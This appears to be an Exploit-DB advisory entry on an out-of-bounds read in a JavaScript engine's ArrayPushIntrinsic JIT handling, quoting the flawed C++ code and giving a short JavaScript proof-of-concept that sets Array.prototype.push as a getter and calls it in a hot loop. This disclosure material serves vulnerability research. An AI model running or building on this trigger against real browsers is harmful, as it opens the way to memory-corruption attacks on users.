Out-of-bounds Read in Array Push Intrinsic

vendor:

N/A

by:

Anonymous

7.5

CVSS

HIGH

Out-of-bounds Read

125

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2020

Out-of-bounds Read in Array Push Intrinsic

This vulnerability occurs when the code always assumes that the current instruction is an op_call instruction, but it can be reached from op_get_by_id or op_get_by_val instructions using getters. As an op_get_by_val instruction is smaller than an op_call instruction in size, this can lead to an Out-of-bounds Read. The PoC code demonstrates how an attacker can exploit this vulnerability.

Mitigation:

Ensure that the code is not vulnerable to Out-of-bounds Reads.

Source

Exploit-DB raw data:

/*
    case ArrayPushIntrinsic: {
        ...

        if (static_cast<unsigned>(argumentCountIncludingThis) >= MIN_SPARSE_ARRAY_INDEX)
            return false;

        ArrayMode arrayMode = getArrayMode(m_currentInstruction[OPCODE_LENGTH(op_call) - 2].u.arrayProfile, Array::Write);
        
        ...
    }

This code always assumes that the current instruction is an op_call instruction. But that code can be reached from op_get_by_id or op_get_by_val instructions using getters. As an op_get_by_val instruction is smaller than an op_call instruction in size, this also can lead to an OOB read.

Note that the handlers for ArraySliceIntrinsic, ArrayIndexOfIntrinsic and ArrayPopIntrinsic have the same pattern.

PoC:
*/

Array.prototype.__defineGetter__('a', Array.prototype.push);

function opt() {
    let arr = new Array(1, 2, 3, 4);
    arr['a' + ''];
}

for (let i = 0; i < 1000; i++) {
    opt();
}